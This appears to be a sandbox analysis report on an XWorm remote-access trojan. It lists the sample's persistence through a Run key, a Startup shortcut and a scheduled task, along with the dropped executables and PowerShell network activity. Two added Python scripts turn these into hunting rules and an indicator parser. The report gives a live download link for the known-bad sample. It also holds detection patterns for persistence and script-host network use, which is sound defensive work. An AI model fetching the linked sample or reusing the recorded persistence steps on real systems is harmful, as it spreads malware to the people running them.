Malware Analysis Report

2024-11-16 13:35

Sample ID 240526-2cb1fafc36
Target https://gofile.io/d/erWKY2
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://gofile.io/d/erWKY2 was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks computer location settings

Drops startup file

Executes dropped EXE

Adds Run key to start application

Enumerates physical storage devices

Creates scheduled task(s)

Modifies registry class

Suspicious use of FindShellTrayWindow

NTFS ADS

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 22:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 22:25

Reported

2024-05-26 22:30

Platform

win10v2004-20240426-en

Max time kernel

300s

Max time network

300s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/erWKY2

Signatures

Detect Xworm Payload

Description Indicator Process Target Count
N/A N/A N/A N/A 2

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target Count
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A 64

The Geo\Nation value is read by the Windows locale APIs that the .NET runtime and many other programs call when resolving the current region, so this signature also fires on plenty of legitimate software. Treat it as context for the execution and persistence signatures below rather than as evidence of geofencing on its own.

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Executes dropped EXE

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A 32
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A 31
N/A N/A C:\ProgramData\$77 N/A 1

Two payloads run from the user's Temp directory. C:\ProgramData\$77 is a PE with no file extension and is the same path the Run key below points at.

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77 = "C:\\ProgramData\\$77" C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
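The three persistence signatures above (Startup .lnk, Run key, scheduled task), the executions from the user's Temp directory and the PowerShell network request together describe what to hunt for on other hosts. The following Python is an added example and is not part of this report: it encodes those behaviours as rules over Sysmon-like events. The event shape, rule names, MITRE technique IDs, the schtasks command line and the network destination are my assumptions; the report records neither of the last two. The $77 rule rests on the fact that the open-source r77 rootkit hides objects whose names start with "$77"; the report shows the prefix on every dropped artifact but does not itself confirm a rootkit is present.

```python
"""Host-event hunting rules derived from the behaviours recorded in this report.

Added example, not part of the sandbox report. Events are flat dicts in a
Sysmon-like shape (constructed here, not taken from the report):
  id 1  process create : image, cmdline
  id 3  network connect: image, dest
  id 11 file create    : image, target
  id 13 registry set   : image, key, value
"""
import re
from dataclasses import dataclass

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
# "$77" is the name prefix the r77 rootkit hides; the report shows the prefix but
# does not confirm r77, so this is a naming heuristic, not a rootkit detection.
DOLLAR77_RE = re.compile(r'(^|\\|")\$77')
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str   # MITRE ATT&CK ID chosen by me for each rule
    image: str
    detail: str


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return every Finding a single event triggers; one event may trigger several."""
    out = []
    image = ev.get("image", "")
    if ev["id"] == 1:
        if TEMP_EXE_RE.search(image):
            out.append(Finding("exec_from_user_temp", "T1204.002", image, image))
        if _base(image) == "schtasks.exe" and "/create" in ev.get("cmdline", "").lower():
            out.append(Finding("schtasks_create", "T1053.005", image, ev["cmdline"]))
    elif ev["id"] == 3 and _base(image) in SCRIPT_HOSTS:
        out.append(Finding("script_host_network", "T1059.001", image, ev["dest"]))
    elif ev["id"] == 11 and STARTUP_LNK_RE.search(ev["target"]):
        out.append(Finding("startup_folder_lnk", "T1547.001", image, ev["target"]))
    elif ev["id"] == 13 and RUN_KEY_RE.search(ev["key"]):
        out.append(Finding("run_key_persistence", "T1547.001", image, f'{ev["key"]} = {ev["value"]}'))
    # Name-based rule: runs over every string field regardless of event type, once per event.
    for field in ("image", "cmdline", "target", "key", "value"):
        if DOLLAR77_RE.search(ev.get(field, "")):
            out.append(Finding("dollar77_prefix", "T1564", image, ev[field]))
            break
    return out


def hunt(events):
    return [f for ev in events for f in evaluate(ev)]


def summarize(findings):
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry mirroring the indicators in this report. The schtasks
# command line and the destination address are invented (the report shows neither).
SID = r"HKU\S-1-5-21-3906287020-2915474608-1755617787-1000"
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"'},
    {"id": 1, "image": r"C:\Users\Admin\AppData\Local\Temp\$77.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\$77.exe"'},
    {"id": 11, "image": r"C:\Users\Admin\AppData\Local\Temp\$77.exe",
     "target": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk"},
    {"id": 13, "image": r"C:\Users\Admin\AppData\Local\Temp\$77.exe",
     "key": SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77", "value": r"C:\ProgramData\$77"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /f /tn Updater /tr "C:\ProgramData\$77"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "dest": "203.0.113.10:443"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},   # benign control
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule:22} {f.technique:10} {f.image} :: {f.detail}")
    print(summarize(hunt(SAMPLE_EVENTS)))
```

The Run key and Startup folder rules are deliberately high-recall; in production they are paired with an allow-list of signed installer images, otherwise every legitimate auto-start registration pages someone. The $77 rule is the one that carries the least ambiguity here, because nothing legitimate on a Windows host names its files, Run values and task targets with that prefix.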

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

The only alternate data stream touched is Edge's own SmartScreen stream on the in-progress download; that is normal browser download handling, not an action of the payload.

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 6
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A 2
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 18
N/A N/A C:\Windows\system32\taskmgr.exe N/A 36
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A 2

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Count
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 6
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A 1
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A 1
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A 1
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A 1
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A 1
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A 51
Token: SeDebugPrivilege N/A C:\ProgramData\$77 N/A 2

Privilege 33 is shown by its LUID value; that is SeIncreaseWorkingSetPrivilege. The taskmgr.exe adjustments are the ones Task Manager makes in normal use. The SeDebugPrivilege requests from the dropped $77.exe, its C:\ProgramData\$77 copy and PowerShell are the ones that matter, since that privilege is what a process needs to open and write other processes.
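Every signature table in this report uses the same space-separated "Description Indicator Process Target" layout, which makes counting repeats and pulling indicators tedious by hand. The following Python is an added example, not part of the report or of the sandbox's own tooling: it parses rows in that layout (the sample rows are copied from the tables above), collapses repeated rows into counts, and extracts the dropped file paths and registry writes. The rule that an all-lowercase line under a heading is a tag list, and the regex describing the cell shapes, are my assumptions about the layout.

```python
"""Parser for the signature tables in this sandbox report.

Added example, not part of the report or of the sandbox's own tooling. Every
table on the page has the same space-separated layout
("Description Indicator Process Target"); the sample rows are copied from it.
"""
import re
from collections import Counter

HEADER = "Description Indicator Process Target"

# Cells contain spaces, so rows are split on the cell shapes the report uses:
# "N/A", a drive-letter path, or a \REGISTRY\ key (optionally followed by = "value").
_CELL = r'N/A|[A-Z]:\\.+?|\\REGISTRY\\.+?'
ROW_RE = re.compile(
    r"^(?P<description>.+?) (?P<indicator>" + _CELL + r") "
    r"(?P<process>N/A|[A-Z]:\\.+?) (?P<target>N/A|[A-Z]:\\.+)$"
)
_PATH_RE = re.compile(r"^[A-Z]:\\")
_SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")   # not user-writable drop locations


def parse_report(text):
    """Return one dict per table row, tagged with the signature heading above it."""
    records, heading, tags = [], None, ()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == HEADER:
            continue
        m = ROW_RE.match(line)
        if m:
            records.append({"signature": heading, "tags": tags, **m.groupdict()})
        elif line == line.lower():
            tags = tuple(line.split())          # assumption: all-lowercase line is a tag list
        else:
            heading, tags = line, ()            # anything else starts a new signature block
    return records


def collapse(records):
    """Identical rows repeated N times become one row with a count, most frequent first."""
    def key(r):
        return (r["signature"], r["description"], r["indicator"], r["process"], r["target"])
    return Counter(key(r) for r in records).most_common()


def extract_iocs(records):
    """Paths outside system directories, plus registry values that were written (not read)."""
    files, registry_writes = set(), {}
    for r in records:
        for field in ("indicator", "process", "target"):
            v = r[field]
            if _PATH_RE.match(v) and not v.lower().startswith(_SYSTEM_DIRS):
                files.add(v)
        if r["indicator"].startswith("\\REGISTRY\\") and r["description"].startswith("Set value"):
            key, _, quoted = r["indicator"].partition(" = ")
            value = quoted.strip('"').replace("\\\\", "\\")   # the report doubles backslashes in values
            registry_writes[key] = value
            if _PATH_RE.match(value):
                files.add(value)
    return {"files": sorted(files), "registry_writes": registry_writes}


# Rows copied from this report's signature tables (a subset, to keep the sample short).
SAMPLE = r"""
Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\ProgramData\$77 N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77 = "C:\\ProgramData\\$77" C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for row, n in collapse(recs):
        print(n, *row)
    print(extract_iocs(recs))
```

The description column is matched lazily and the indicator column is anchored on the few shapes the report emits, so a multi-word description such as "File opened for modification" or a quoted registry value containing a path is still split into the right cells. The file list deliberately drops anything under C:\Windows or Program Files: those are the system binaries that performed an action, not artifacts to block.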

Suspicious use of FindShellTrayWindow

Description Indicator Process Target Count
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 35
N/A N/A C:\Windows\system32\taskmgr.exe N/A 29

Only the browser and Task Manager trigger this signature; neither dropped payload does.

Suspicious use of SendNotifyMessage

Description Indicator Process Target Count
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A 24
N/A N/A C:\Windows\system32\taskmgr.exe N/A 16
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1460 wrote to memory of 4048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/erWKY2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff92b3a46f8,0x7ff92b3a4708,0x7ff92b3a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

